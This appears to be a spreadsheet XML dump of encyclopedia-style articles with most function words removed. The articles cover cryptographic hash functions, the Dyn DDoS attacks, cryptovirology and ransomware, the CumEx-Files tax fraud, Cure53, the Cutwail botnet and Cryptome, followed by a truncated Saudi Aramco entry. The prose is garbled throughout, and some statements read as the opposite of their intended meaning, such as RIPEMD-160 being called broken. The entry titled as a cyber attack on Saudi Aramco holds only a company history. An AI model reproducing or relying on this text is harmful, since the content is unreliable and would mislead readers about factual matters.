good-will token send e-mail hashcash. sender required find message whose hash value begins number zero bits. average work sender needs perform order find valid message exponential number zero bits required hash value, recipient verify validity message executing single hash function. instance, hashcash, sender asked generate header whose 160-bit sha-1 hash value first bits zeros. sender will, average, times find valid header. file data identifier message digest also serve means reliably identifying file; several source code management systems, including git, mercurial monotone, sha1sum various types content (file content, directory trees, ancestry information, etc.) uniquely identify them. hashes used identify files peer-to-peer filesharing networks. example, ed2k link, md4-variant hash combined file size, providing sufficient information locating file sources, downloading file, verifying contents. magnet links another example. such file hashes often hash hash list hash tree allows additional benefits. main applications hash function allow fast look-up data hash table. being hash functions particular kind, cryptographic hash functions lend well application too. however, compared standard hash functions, cryptographic hash functions tend much expensive computationally. reason, tend used contexts necessary users protect possibility forgery (the creation data digest expected data) potentially malicious participants. hash functions based block ciphers there several methods block cipher build cryptographic hash function, specifically one-way compression function. methods resemble block cipher modes operation usually used encryption. many well-known hash functions, including md4, md5, sha-1 sha-2, built block-cipher-like components designed purpose, feedback ensure resulting function invertible. sha-3 finalists included functions block-cipher-like components (e.g., skein, blake) though function finally selected, keccak, built cryptographic sponge instead. standard block cipher used place custom block ciphers; might useful embedded system needs implement encryption hashing minimal code size hardware area. however, approach costs efficiency security. ciphers hash functions built hashing: large keys blocks, efficiently change keys every block, designed vetted resistance related-key attacks. general-purpose ciphers tend different design goals. particular, block sizes make nontrivial generate long hash values; encryption becomes less efficient changes block; related-key attacks make potentially less secure hash function encryption. hash function design merkle–damgård construction hash function must able process arbitrary-length message fixed-length output. this achieved breaking input series equally sized blocks, operating sequence using one-way compression function. compression function either specially designed hashing built block cipher. hash function built merkle–damgård construction resistant collisions compression function; collision full hash function traced back collision compression function. last block processed also unambiguously length padded; crucial security construction. this construction called merkle–damgård construction. most common classical hash functions, including sha-1 md5, take form. wide pipe versus narrow pipe straightforward application merkle–damgård construction, size hash output equal internal state size (between compression step), results narrow-pipe hash design. this design causes many inherent flaws, including length-extension, multicollisions, long message attacks, generate-and-paste attacks, also cannot parallelized. result, modern hash functions built wide-pipe constructions larger internal state size range tweaks merkle–damgård construction constructions sponge construction haifa construction. none entrants nist hash function competition classical merkle–damgård construction.meanwhile, truncating output longer hash, used sha-512/256, also defeats many attacks. building cryptographic primitives hash functions used build cryptographic primitives. primitives cryptographically secure, care must taken build correctly. message authentication codes (macs) (also called keyed hash functions) often built hash functions. hmac mac. just block ciphers used build hash functions, hash functions used build block ciphers. luby-rackoff constructions using hash functions provably secure underlying hash function secure. also, many hash functions (including sha-1 sha-2) built using special-purpose block cipher davies–meyer construction. that cipher also used conventional mode operation, without security guarantees; example, shacal, bear lion. pseudorandom number generators (prngs) built using hash functions. this done combining (secret) random seed counter hashing some hash functions, skein, keccak, radiogatún, output arbitrarily long stream used stream cipher, stream ciphers also built fixed-length digest hash functions. often done first building cryptographically secure pseudorandom number generator using stream random bytes keystream. seal stream cipher uses sha-1 generate internal tables, used keystream generator less unrelated hash algorithm. seal guaranteed strong weak) sha-1. similarly, expansion hc-128 hc-256 stream ciphers makes heavy sha-256 hash function. concatenation concatenating outputs multiple hash functions provide collision resistance good strongest algorithms included concatenated result. example, older versions transport layer security (tls) secure sockets layer (ssl) used concatenated sha-1 sums. this ensures method find collisions hash functions defeat data protected hash functions.for merkle–damgård construction hash functions, concatenated function collision-resistant strongest component, collision-resistant. antoine joux observed 2-collisions lead n-collisions: feasible attacker find messages hash, find many additional messages hash desire, greater difficulty. among messages hash, likely collision sha-1. additional work needed find sha-1 collision (beyond exponential birthday search) requires polynomial time. cryptographic hash algorithms there many cryptographic hash algorithms; section lists algorithms referenced relatively often. extensive list found page containing comparison cryptographic hash functions. designed ronald rivest 1991 replace earlier hash function, md4, specified 1992 1321. collisions calculated within seconds makes algorithm unsuitable cases cryptographic hash required. produces digest bits bytes). sha-1 sha-1 developed part u.s. government's capstone project. original specification commonly called sha-0 algorithm published 1993 title secure hash standard, fips 180, u.s. government standards agency nist (national institute standards technology). withdrawn shortly publication superseded revised version, published 1995 fips 180-1 commonly designated sha-1. collisions full sha-1 algorithm produced using shattered attack hash function considered broken. sha-1 produces hash digest bits bytes). documents refer sha-1 "sha", even though conflict secure hash algorithms sha-0, sha-2, sha-3. ripemd-160 ripemd (race integrity primitives evaluation message digest) family cryptographic hash functions developed leuven, belgium, hans dobbertin, antoon bosselaers, bart preneel cosic research group katholieke universiteit leuven, first published 1996. ripemd based upon design principles used similar performance popular sha-1. ripemd-160 has, however, broken. name implies, ripemd-160 produces hash digest bits bytes). whirlpool whirlpool cryptographic hash function designed vincent rijmen paulo barreto, first described 2000. whirlpool based substantially modified version advanced encryption standard (aes). whirlpool produces hash digest bits bytes). sha-2 sha-2 (secure hash algorithm cryptographic hash functions designed united states national security agency (nsa), first published 2001. they built using merkle–damgård structure, one-way compression function built using davies–meyer structure (classified) specialized block cipher. sha-2 basically consists hash algorithms: sha-256 sha-512. sha-224 variant sha-256 different starting values truncated output. sha-384 lesser-known sha-512/224 sha-512/256 variants sha-512. sha-512 secure sha-256 commonly faster sha-256 64-bit machines amd64. output size bits given extension "sha" name, sha-224 output size bits bytes); sha-256, bytes; sha-384, bytes; sha-512, bytes. sha-3 sha-3 (secure hash algorithm released nist august 2015. sha-3 subset broader cryptographic primitive family keccak. keccak algorithm work guido bertoni, joan daemen, michael peeters, gilles assche. keccak based sponge construction also used build cryptographic primitives stream cipher. sha-3 provides output sizes sha-2: 224, 256, 384, bits. configurable output sizes also obtained using shake-128 shake-256 functions. here -128 -256 extensions name imply security strength function rather output size bits. blake2 blake2, improved version blake, announced december 2012. created jean-philippe aumasson, samuel neves, zooko wilcox-o'hearn, christian winnerlein goal replacing widely used broken sha-1 algorithms. when 64-bit architectures, blake2b faster sha-3, sha-2, sha-1, md5. although blake blake2 standardized sha-3 has, blake2 used many protocols including argon2 password hash, high efficiency offers modern cpus. blake candidate sha-3, blake blake2 offer output sizes sha-3 including configurable output size. blake3 blake3, improved version blake2, announced january 2020. created jack o'connor, jean-philippe aumasson, samuel neves, zooko wilcox-o'hearn. blake3 single algorithm, contrast blake blake2, algorithm families multiple variants. blake3 compression function closely based blake2s, biggest difference number rounds reduced internally, blake3 merkle tree, supports higher degrees parallelism blake2. attacks cryptographic hash algorithms there long list cryptographic hash functions many found vulnerable used. instance, nist selected hash functions candidates round sha-3 hash competition, considered broken showed significant weaknesses therefore make next round; information found main article nist hash function competitions. even hash function never broken, successful attack weakened variant undermine experts' confidence. instance, august 2004 collisions found several then-popular hash functions, including md5. these weaknesses called question security stronger algorithms derived weak hash functions particular, sha-1 strengthened version sha-0), ripemd-128, ripemd-160 (both strengthened versions ripemd).on august 2004, joux, carribault, lemuel, jalby announced collision full sha-0 algorithm. joux accomplished using generalization chabaud joux attack. they found collision complexity took 80,000 hours supercomputer itanium processors equivalent days full-time supercomputer.in february 2005, attack sha-1 reported would find collision hashing operations, rather expected 160-bit hash function. august 2005, another attack sha-1 reported would find collisions operations. other theoretical weaknesses sha-1 known: february 2017 google announced collision sha-1. security researchers recommend applications avoid problems using later members family, sha-2, using techniques randomized hashing require collision resistance. successful, practical attack broke used within certificates transport layer security 2008.many cryptographic hashes based merkle–damgård construction. cryptographic hashes directly full output merkle–damgård construction vulnerable length extension attacks. this makes md5, sha-1, ripemd-160, whirlpool, sha-256 sha-512 hash algorithms vulnerable specific attack. sha-3, blake2, blake3, truncated sha-2 variants vulnerable type attack. attacks hashed passwords common hashes store password authentication data. rather store plaintext user passwords, controlled access system stores hash user's password file database. when someone requests access, password submit hashed compared stored value. database stolen frequent occurrence), thief hash values, passwords. however, people choose passwords predictable ways. lists common passwords widely circulated many passwords short enough possible combinations tested fast hashes used. cryptographic salt prevents attacks, building files precomputing hash values, e.g. rainbow tables. searches order billion tests second possible high-end graphics processors, making direct attacks possible even salt. united states national institute standards technology recommends storing passwords using special hashes called derivation functions (kdfs) created slow brute force searches.: 5.1.1.2 slow hashes include pbkdf2, bcrypt, scrypt, argon2, balloon recent modes unix crypt. ksfs perform multiple hashes slow execution, nist recommends iteration count 10,000 more.: 5.1.1.2 also references citations sources external links paar, christof; pelzl, (2009). "11: hash functions". understanding cryptography, textbook students practitioners. springer. archived original 2012-12-08. (companion site contains online cryptography course covers hash functions) "the ecrypt hash function website". buldas, (2011). "series mini-lectures cryptographic hash functions". archived original 2012-12-06. open source python based application used verify downloads.</t>
  </si>
  <si>
    <t>DDoS attacks on Dyn</t>
  </si>
  <si>
    <t>october 2016, three consecutive distributed denial-of-service attacks launched domain name system (dns) provider dyn. attack caused major internet platforms services unavailable large swathes users europe north america. groups anonymous world hackers claimed responsibility attack, scant evidence provided.as provider, provides end-users service mapping internet domain name—when, instance, entered browser—to corresponding address. distributed denial-of-service (ddos) attack accomplished numerous lookup requests tens millions addresses. activities believed executed botnet consisting many internet-connected devices—such printers, cameras, residential gateways baby monitors—that infected mirai malware. affected services services affected attack included: investigation department homeland security started investigation attacks, according white house source. group hackers claimed responsibility immediate aftermath attack. dyn's chief strategist said interview assaults company's servers complex unlike everyday ddos attacks. barbara simons, member advisory board united states election assistance commission, said attacks could affect electronic voting overseas military civilians.dyn disclosed that, according business risk intelligence firm flashpoint akamai technologies, attack botnet coordinated numerous internet things-enabled (iot) devices, including cameras, residential gateways, baby monitors, infected mirai malware. attribution attack mirai botnet previously reported backconnect inc., another security firm. stated receiving malicious requests tens millions addresses. mirai designed brute-force security device, allowing controlled remotely. cybersecurity investigator brian krebs noted source code mirai released onto internet open-source manner weeks prior, made investigation perpetrator difficult.on october 2016, president obama stated investigators still idea carried cyberattack.on december 2017, justice department announced three (paras jha, josiah white, dalton norman, entered guilty pleas cybercrime cases relating mirai clickfraud botnets. perpetrators correspondence website politico, hacktivist groups spainsquad, anonymous, world hackers claimed responsibility attack retaliation ecuador's rescinding internet access wikileaks founder julian assange, embassy london, granted asylum. this claim confirmed. wikileaks alluded attack twitter, tweeting "mr. assange still alive wikileaks still publishing. supporters stop taking internet. proved point." world hackers claimed responsibility past similar attacks targeting sites like espn.com.on october flashpoint stated attack likely done script kiddies.a november 2016, forbes article reported attack likely carried angry gamer".a september 2018, welivesecurity article stated three creators meant gaining advantage fierce competition surrounding computer game minecraft preventing players using competitors’ servers driving servers order ultimately make money them.on december 2020, perpetrators pleaded guilty taking part attack. perpetrator's name withheld age. also wannacry ransomware attack mirai (malware) vulnerability (computing) (dyndns) ddos attack references</t>
  </si>
  <si>
    <t>Cryptovirology</t>
  </si>
  <si>
    <t>cryptovirology field studies cryptography design powerful malicious software. field born observation public-key cryptography used break symmetry antivirus analyst sees regarding malware attacker sees. antivirus analyst sees public contained malware, whereas attacker sees public contained malware well corresponding private (outside malware) since attacker created pair attack. public allows malware perform trapdoor one-way operations victim's computer attacker undo. overview field encompasses covert malware attacks attacker securely steals private information symmetric keys, private keys, prng state, victim's data. examples covert attacks asymmetric backdoors. asymmetric backdoor backdoor (e.g., cryptosystem) used attacker, even found. this contrasts traditional backdoor symmetric, i.e., anyone finds kleptography, subfield cryptovirology, study asymmetric backdoors generation algorithms, digital signature algorithms, exchanges, pseudorandom number generators, encryption algorithms, cryptographic algorithms. nist dual drbg random generator asymmetric backdoor ec-drbg algorithm utilizes discrete-log kleptogram kleptography, definition makes ec-drbg cryptotrojan. like ransomware, ec-drbg cryptotrojan contains uses attacker's public attack host system. cryptographer juels indicated effectively orchestrated kleptographic attack users dual drbg pseudorandom number generation algorithm that, although security professionals developers testing implementing kleptographic attacks since 1996, "you would hard-pressed find actual now." public outcry cryptovirology attack, nist rescinded ec-drbg algorithm nist 800-90 standard.covert information leakage attacks carried cryptoviruses, cryptotrojans, cryptoworms that, definition, contain public attacker major theme cryptovirology. "deniable password snatching," cryptovirus installs cryptotrojan asymmetrically encrypts host data covertly broadcasts this makes available everyone, noticeable (except attacker), decipherable attacker. attacker caught installing cryptotrojan claims virus victim. attacker observed receiving covert asymmetric broadcast thousands, millions receivers, exhibits identifying information whatsoever. cryptovirology attack achieves "end-to-end deniability." covert asymmetric broadcast victim's data. cryptovirology also encompasses private information retrieval (pir) allow cryptoviruses search steal host data without revealing data searched even cryptotrojan constant surveillance. definition, cryptovirus carries within coding sequence query attacker necessary logic apply query host systems. history first cryptovirology attack, invented adam young moti yung, called "cryptoviral extortion" presented 1996 ieee security privacy conference. attack, cryptovirus, cryptoworm, cryptotrojan contains public attacker hybrid encrypts victim's files. malware prompts user send asymmetric ciphertext attacker decipher return symmetric decryption contains fee. victim needs symmetric decrypt encrypted files recover original files (e.g., backups). 1996 ieee paper predicted cryptoviral extortion attackers would demand e-money, long bitcoin even existed. many years later, media relabeled cryptoviral extortion ransomware. 2016, cryptovirology attacks healthcare providers reached epidemic levels, prompting u.s. department health human services issue fact sheet ransomware hipaa. fact sheet states electronic protected health information encrypted ransomware, breach occurred, attack therefore constitutes disclosure permitted hipaa, rationale adversary taken control information. sensitive data might never leave victim organization, break-in allowed data sent undetected. california enacted defines introduction ransomware computer system intent extortion law. examples tremor virus while viruses wild used cryptography past, purpose usage cryptography avoid detection antivirus software. example, tremor virus used polymorphism defensive technique attempt avoid detection anti-virus software. though cryptography assist cases enhance longevity virus, capabilities cryptography used payload. one-half virus amongst first viruses known encrypted affected files. tro_ransom.a virus example virus informs owner infected machine ransom virus nicknamed tro_ransom.a. this virus asks owner infected machine send $10.99 given account western union.virus.win32.gpcode.ag classic cryptovirus. this virus partially uses version 660-bit encrypts files many different extensions. instructs owner machine email given mail owner desires decryptor. contacted email, user asked certain amount ransom return decryptor. capi demonstrated using different calls microsoft's cryptographic (capi), cryptovirus satisfy encryption needs. other uses cryptography-enabled malware apart cryptoviral extortion, potential uses cryptoviruses, deniable password snatching, cryptocounters, private information retrieval, secure communication different instances distributed cryptovirus. references external links cryptovirology labs site maintained adam young moti yung cryptography cryptovirology articles heavens archived 2015-02-03 wayback machine computer viruses cryzip trojan encrypts files, demands ransom virus lead enterprise court? student report entitled superworms cryptovirology next virus generation: overview (cryptoviruses) archived 2010-10-25 wayback machine angelo rosiello</t>
  </si>
  <si>
    <t>CumEx-Files</t>
  </si>
  <si>
    <t>cumex-files investigation number european news media outlets fraud scheme discovered 2017. network banks, stock traders, lawyers obtained billions european treasuries suspected fraud speculation involving dividend taxes. five hardest countries lost least $62.9 billion. germany hardest country, around $36.2 billion withdrawn german treasury. estimated losses countries include least billion france, €4.5 billion italy, €1.7 billion denmark €201 million belgium.the name "cum-ex" derived latin, meaning "with without", refers disappearing nature fraudulent dividend payments. method network stole several billion euros treasury, correctiv calls "cum-ex" trade: participants network would lend shares large companies, authorities would appear owners shares, one. bank used stock trading would issue "confirmation" investor dividend payment paid, without done. "it’s like parents claiming child benefit children child family." writes correctiv. this practice outlawed 2012.the name "cum-ex" derived latin, meaning "with without", refers disappearing nature fraudulent dividend payments.in cum-ex trades, shares without dividend rights quickly traded various market participants payout date dividend, allowing traders reclaim double taxes. financial institutions essence exploited legal loophole allowed parties simultaneously claim ownership shares, therefore allowing claim rebates entitled. authorities since deemed reclaims illegitimate, time trades, less black white, vast network traders, analysts lawyers thought involved practice throughout continent.the elite firm freshfields bruckhaus deringer gave advice used justify legality scheme. november 2019, johannemann, former freshfield lawyer arrested.in 2020, european banking authority announced 10-point action plan enhance future regulatory framework surrounding dividend arbitrage trading schemes. according report, countries, deals criminal offences. danish dividend scandal 2010, audit report, danish ministry taxation found ignored warnings multiple occasions legal loophole concerning dividend tax.in june 2020, reported investigators transactions took advantage european rules taxing dividends, made possible refunds using combination short sales future transactions. lawsuits france october 2018, socialist deputy boris vallaud filed complaint fraud aggravated fraud laundering national financial prosecutor's office. parliamentary information mission evasion national assembly also published report results fight cross-border malicious financial engineering. discovery danish state commissioner august schäfer first warned practice 1992, testimony five whistleblowers. however, practice remained widespread administrative assistant german federal central office noticed abnormally large rebate claims pension fund. implicated institutions various banks financial institutions involved alleged trades. among named leaked files include macquarie bank, deutsche bank, hypovereinsbank, warburg, maple bank, merrill lynch, kpmg, ernst young, investec, freshfields. investigations revealed since 2012 investec provided dutch broker frank vogel billion facilitate alleged arbitrage scheme. also dividend stripping sanjay shah references external links media related cumex-files wikimedia commons official website correctiv</t>
  </si>
  <si>
    <t>Cure53</t>
  </si>
  <si>
    <t>cure53 german cybersecurity firm. company founded mario heidrich, client side security researcher. after report cure53 south korean security smart sheriff, described apps security holes "catastrophic", south korean government ordered smart sheriff shut down. references external links homepage linkedin github twitter</t>
  </si>
  <si>
    <t>Cutwail botnet</t>
  </si>
  <si>
    <t>cutwail botnet, founded around 2007, botnet mostly involved sending spam e-mails. typically installed infected machines trojan component called pushdo. affects computers running microsoft windows. history june 2009 estimated cutwail botnet largest botnet terms amount infected hosts. security provider messagelabs estimated total size botnet around million individual computers, capable sending billion spam messages day, million every minute, equal 46.5% worldwide spam volume.in february 2010 botnet's activities slightly altered started ddos attack major sites, including cia, fbi, twitter paypal. reasons attack fully understood, experts described "accident", mainly lack damage disruption, along infrequency attacks.in august 2010, researchers university california, santa barbara ruhr university bochum attempted take botnet, managed take offline command control servers botnet using. structure cutwail fairly simple botnet. bots connect directly command control server, receive instructions emails send. after done task, bots report back spammer exact statistics number emails delivered, many errors reported. operations cutwail botnet known "0bulk psyche evolution" underground market. spammers rent instance botnet fee, send spam campaigns. services offered botnet advertised russian underground forum "spamdot.biz", taken 2010. june 2010, least different spam groups using botnet deliver junk mail. also operation: roast mccolo srizbi botnet botnet references external links technical study pushdo trojan</t>
  </si>
  <si>
    <t>Cryptome</t>
  </si>
  <si>
    <t>cryptome 501(c)(3) private foundation created 1996 john young deborah natsios sponsored natsios-young architects. site collects information freedom expression, privacy, cryptography, dual-use technologies, national security, intelligence, government secrecy.cryptome known publishing alleged identity analyst located osama laden, lists people allegedly associated stasi, psia. cryptome early organizers wikileaks. cryptome also known publishing alleged identity british intelligence agent anti-irish republican army assassin stakeknife alleged internal emails wikileaks organization. cryptome republished already public surveillance disclosures edward snowden announced june 2014 would publish unreleased snowden documents later month.cryptome received praise notable organizations eff, also subject criticism controversy. cryptome accused wikileaks forging emails cryptome's posted documents called "invitation terrorists." website also criticized posting maps pictures "dangerous achilles' heel[s] domestic infrastructure," york times called "tip [to] terrorists." news also criticized cryptome posting information terrorists could plan attacks. cryptome continued post controversial materials including guides "how attack critical infrastructure" addition instructions illegal hacking "for without patience wait whistleblowers". cryptome also received criticism handling private embarrassing information. people john young john young born 1935. grew west texas father worked decommissioned texas camp, young later served united states army corps engineers germany (1953–56) earned degrees philosophy architecture rice university (1957–63). went receive graduate degree architecture columbia university 1969. self-identified radical, became activist helped create community service group urban deadline, fellow student-activists initially suspected police spy. urban deadline went receive citations citizens union city york york city council, later evolved cryptome. work earned position nominating committee chrysler award innovation design 1998.he received citations american society mechanical engineers, american society civil engineers legal society. 1993, awarded certificate special congressional recognition. stated "acknowledge power law." deborah natsios deborah natsios grew safe houses across europe, asia south america reserved covert station chiefs. later received graduate degree architecture princeton university. taught architecture urban design columbia university parsons school design, held seminars pratt institute university texas. principal natsios young architects.in addition co-editor cryptome, responsible associated project cartome, founded 2011 posts original critical graphical images public resources document sensitive areas. additionally holds degree mathematics smith college. given talks usenix annual technical conference architectures fear: terrorism future urbanism west, written topics ranging architectural theory defenses bell assassination politics. notable critic edward snowden. family natsios daughter nicholas natsios, served station chief greece 1948–1956, vietnam 1956–1960, france 1960–1962, south korea 1962–1965, argentina 1965–1969, netherlands 1969–1972, iran 1972–1974. while stationed vietnam, deputy william colby, future director central intelligence. name included 1996 membership directory association former intelligence officers, cryptome helped publish. cryptome acknowledged link nicholas natsios 2000. activities digital library cryptome's digital library includes series cartome: archive news spatial geographic documents privacy, cryptography, dual-use technologies, national security intelligence—communicated imagery systems: cartography, photography, photogrammetry, steganography, camouflage, maps, images, drawings, charts, diagrams, imint reverse-panopticon counter-deception potential. cryptome information, documents opinions banned people's republic china. nuclear power plants series. protest photos series. most dangerous buildings series. editorial policy young said cryptome, expect false documents sort out." another interview, young promoted skepticism sources information, saying: "facts trustworthy source knowledge. cryptome authoritative source." when asked providing context material, young said, believe 'context.' that authoritarian nonsense. reason, believe verification, authentication, background."the front page cryptome website states "documents removed site order served directly court jurisdiction. court order ever served; order served published elsewhere gagged order." however, documents removed request enforcement well individuals. privacy policy 2015, discovered cryptome's archives contained server logs, containing clues identities cryptome visitors including addresses files accessed cryptome. cryptome initially stated faked part disinformation campaign. several days later, cryptome confirmed logs real shared findings. logs mailed users ordered site's archive since changed hosts 2007, cryptome blamed current isp, network solutions.cryptome warned users technical measures protect anonymity sources, saying "don’t send stuff think we’ll protect you." history 1968: urban deadline created extension columbia strike avery hall occupation. three decades later, cryptome evolves urban deadline. 1993: young natsios collaboration begins "some time late 1993". young received certificate special congressional recognition. 1994: what became cryptome began young natsios's participation cypherpunks electronic mailing list urban deadline. natsios called time "seminal" "transformative" internet. 1996: cryptome officially created architectural practice. 1999: october journalist declan mccullagh wrote young's perusal site's access logs. 2000: cartome founded. july, agents spoke cryptome phone cryptome published public security intelligence agency personnel file. file listed names, birthdates, titles, notably included director general hidenao toyoshima. expressed concerns file, admitted legal publish united states japan. after speculation documents come someone called "shigeo kifuji", cryptome identified source hironari noda. 2004: york city removed warning signs around mains cryptome posts pictures them, citing security concerns. 2006: cryptome became early organizers wikileaks. young revealed approached julian assange asked public face wikileaks; young agreed name listed website's original domain registration form. 2007: early part year, young natsios left wikileaks concerns organizations' finances fundraising, accusing "money-making operation" "business intelligence" scheme, expressing concern amount money sought "could needed soon except suspect purposes." cryptome published archive secret, internal electronic mailing list wikileaks organizers, inception young's departure group. april website received notice hosting company, verio, would evicted unspecified breaches acceptable policy. cryptome alleged shutdown censorship attempt response posts coast guard's deepwater program. 2010: cryptome's earthlink account compromised, leading website hacked cryptome's data copied. hackers posted screenshots compromised email account. cryptome confirmed accuracy information taken, contested specific assertions, claiming seven gigabytes data, seven terabytes attackers claimed copy. february, cryptome briefly shut network solutions alleged dmca violations posted "microsoft legal manual". microsoft withdraws complaint days later website restored. march, paypal stopped processing donations cryptome froze account "suspicious activities". account restored "investigation" paypal. cryptome ended terms wikileaks, young directly accusing selling classified material calling criminal organization". separate interview, called assange narcissist compared henry kissinger. young also accused george soros koch brothers "backing wikileaks generously".2011: july, cryptome named alleged analyst found osama laden. august cryptome downloaded decrypted cablegate files. september cryptome published unredacted united states diplomatic cables leak wikileaks. september, cryptome published list intelligence national security alliance members, alleging spies. 2012: february, cryptome website hacked infect visitors malware. 2013: february, cryptome's website, email twitter account compromised, exposing whistleblowers sources corresponded cryptome email. cryptome blamed hackers ruxpin sabu, informant time. june secret service agents visited cryptome request removal former presidential bush family email allegedly hacked guccifer. august, complaint cryptome's identification alleged japanese terrorists network solutions briefly shut site. october cryptome informed users network solutions generated logs site's visitors, requests delete logs honored. (according network solutions's website, logs deleted thirty days cryptome could choose prevent logging.) 2014: cryptome attempted raise $100,000 fund website disclosure initiatives. june, cryptome pulled offline malware found infecting visitors site. july, cryptome said would publish remaining documents taken edward snowden "coming weeks". 2015: september, cryptome announced encryption keys compromised. days later, cryptome filed incorporation york. later month, gchq document leaked edward snowden revealed agency monitoring visits cryptome. october, sold edition (usb stick) cryptome archive observed contain server logs, containing clues identities cryptome visitors. logs mailed users ordered site's archive least since 2007. cryptome denied logs real, accused discoverer forging data forms corruption. cryptome later confirmed real. cryptome posted pictures logs dating back site's creation, claiming cryptome sale. cryptome later claimed sale parody "cryptome logs, never has", noting "various isps copious logs many kinds" along metadata cryptome tracks happens files". 2016: april, cryptome published thousands credit-card numbers, passwords personal information allegedly belonging qatar national bank's clients. july, cryptome alleged linknyc "tracking cryptome's movements city" company responded cryptome's social media posts attempting prevent photographing company's installations. 2020: september, cryptome testified published unredacted cables wikileaks, never contacted enforcement instructed remove them. reception 2004 york times article assessed cryptome headline, "advise public, terrorists" coverage site's pipeline maps. reader's digest made even alarming assessment site 2005, calling "invitation terrorists" alleging young "may well lives risk".a 2007 wired article criticized cryptome going "overboard". village voice featured cryptome 2008 best feature, citing hosting "photos, facts, figures" iraq war.wikileaks accused cryptome executing "smear campaign" 2010 cryptome posted said email exchanges wikileaks insiders, wikileaks disputed.cryptome awarded defensor libertatis (defender liberty) award 2010 brother awards, "life fight surveillance censorship" providing "suppressed otherwise censored documents global public". awards committee noted cryptome engaged "every protagonist military-electronic monitoring complex".in 2012, steven aftergood, director federation american scientists project government secrecy, described young cryptome "fearless contemptuous pretensions authority" "oblivious security concerns preconditions working democracy. seems indifferent human costs involuntary disclosure personal information." aftergood specifically criticized cryptome's handling mcgurk emails, saying "it's fine oppose mcgurk anyone else. necessary humiliate them".in 2013, cindy cohn, legal director electronic frontier foundation, praised cryptome really important safety valve rest government to."in 2014, glenn greenwald praised criticized cryptome, saying "there obvious irony complaining we're profiting work [cryptome] tries raise $100,000 featuring work. even though [cryptome] occasionally repellent demented things—such posting home addresses laura poitras, bart gellman, along maps pointing homes—[they also things quite productive valuable. whole, glad cryptome hope succeed raising money want."giganews criticized cryptome posting unverified allegations giganews described completely false without evidence. giganews went question cryptome's credibility motives, saying "cryptome's failure contact validate allegations respond concerns lessened credibility. seem cryptome search truth, leaves question true motives."peter earnest, 36-year veteran turned executive director international museum chairman board directors association intelligence officers criticized cryptome publishing names spies, saying considerable damage aids people would harm. also cryptome quotes cypherpunks distributed denial secrets espionage open government wikileaks references external links official: official website cryptome index natsios young research youtube channelmirrors: wikileaks search cryptome archive tweets wikileaks mirror cryptome dataset 1996-2016 102,000 files internet archive cryptome archives hosted cthulhu siteprotect.net mirrorother: snowden docs should public: interview cryptome (cox, joseph, vice/motherboard, july 2014) older, quieter wikileaks, cryptome perseveres (associated press, mar. 2013) wikileaks' estranged co-founder becomes critic (q&amp;a) young natsios radio interview emmanuel goldstein hook. (february 2012, wbai) open source design architects information (domus june 2011) excerpt from 'this machine kills secrets': meet 'spiritual godfather online leaking' (greenberg, andy, september 2012)</t>
  </si>
  <si>
    <t>Cyber attack on Saudi Aramco</t>
  </si>
  <si>
    <t>saudi aramco (arabic: أرامكو السعودية ʾarāmkū as-suʿūdiyyah), officially saudi arabian company (formerly arabian-american company), saudi arabian public petroleum natural company based dhahran. 2020, largest companies world revenue. saudi aramco world's second-largest proven crude reserves, billion barrels billion cubic metres), largest daily production oil-producing companies. single greatest contributor global carbon emissions company world since 1965. 2022, saudi aramco became largest (most valuable) company world market cap, surpassing apple inc.saudi aramco operates world's largest single hydrocarbon network, master system. 2013 crude production total billion barrels (540 million cubic metres), manages hundred fields saudi arabia, including 288.4 trillion standard cubic feet (scf) natural reserves. saudi aramco operates ghawar field, world's largest onshore field, safaniya field, world's largest offshore field.on december 2019, company's shares commenced trading tadawul stock exchange. shares rose 35.2 saudi riyals, giving market capitalisation us$1.88 trillion, surpassed us$2 trillion mark second trading. 2020 forbes global 2000, saudi aramco ranked 5th-largest public company world. march 2021, saudi aramco announced earnings 2020 fell nearly compared 2019, lockdowns around world following covid-19 pandemic curbed demand oil. history saudi aramco's origins trace shortages world exclusion american companies mesopotamia united kingdom france remo petroleum agreement 1920. administration time popular support "open door policy", herbert hoover, secretary commerce, initiated 1921. standard california (socal) among companies seeking sources abroad.through subsidiary company, bahrain petroleum (bapco), socal struck bahrain 1932. this event heightened interest prospects arabian mainland. 1933, saudi arabian government granted concession socal preference rival iraq petroleum concession allowed socal explore saudi arabia. socal assigned concession wholly owned subsidiary, california-arabian standard (casoc). 1936, company success locating oil, texas company (texaco) purchased stake concession. after four years fruitless exploration, first success came seventh drill site dhahran 1938, well referred dammam this well immediately produced 1,500 barrels (240 m3/d), giving company confidence continue. january 1944, company name changed california-arabian standard arabian american aramco). 1948, standard jersey (later known exxon) purchased socony vacuum (later mobil) purchased company, socal texaco retaining each. newcomers also shareholders iraq petroleum restrictions line agreement lifted order free enter arrangement. 1949, aramco made incursions emirate dhabi, leading border dispute dhabi saudi arabia. 1950, king abdulaziz threatened nationalize country's facilities, thus pressuring aramco agree share profits 50/50.a similar process taken place american companies venezuela years earlier. american government granted aramco member companies break known golden gimmick equivalent profits given king abdulaziz. wake arrangement, company's headquarters moved york dhahran. 1951, company discovered safaniya field, world's largest offshore field. 1957, discovery smaller connected fields confirmed ghawar field world's largest onshore field.in 1975, saudi arabia second five-year economic plan included master plan. natural would used generate power, rather flaring gas. plan counted using associated gas, 1985, aramco able include billion standard cubic foot (bscfd) non-associated gas. this non-associated produced kuff formation, limestone layer metres (2,130 producing arab zone. 1994, aramco discovered non-associated deeper jawf sandstone formation, built plants hawiyah haradh process this increased capacity master system billion scfd.: 98–100, 104, 129–130, kippur 1973, following support israel kippur war, saudi arabian government acquired "participation interest" aramco's assets. increased participation interest 1974 acquired remaining interest 1976. aramco continued operate manage former aramco assets, including concessionary interest certain saudi arab fields, behalf saudi arab government 1988. november 1988, royal decree created saudi arab company, saudi arabian company, take control former aramco assets saudi aramco) took management operations control saudi arabia's fields aramco partners. 1989–90, high-quality discovered three areas south riyadh: raghib area miles (124 southeast capital. gulf sept. 1990, start gulf war, aramco expected replace much production removed global market embargo iraq occupied kuwait. this amounted producing extra million barrels (mbpd) keep global market stable. addition, aramco expected provide coalition aviation diesel needs. aramco recommissioned harmaliyah, khurais, ghawar wells associated separation plants, saltwater treatment pipeline, mothballed 1980s price collapse. daily production increased mbpd july mbpd december 1990 three-month de-mothball effort.: 125, 135, 148–149, 155–156 starting 1990, aramco embarked expansion crude sales asian market. agreements south korea, philippines, china resulted. 2016, aramco's crude sales asia.: 168, 176, 184–185 2000s 2001, saudi arabia announced initiative, proposed forming three joint ventures eight iocs exploration pure upstream acreage. core venture included south ghawar north rub' al-khali, core venture included sea, core venture involved shaybah kidan. 2003, royal dutch shell totalenergies formed partnership saudi aramco core venture 2004, core venture became three separate joint ventures saudi aramco holding 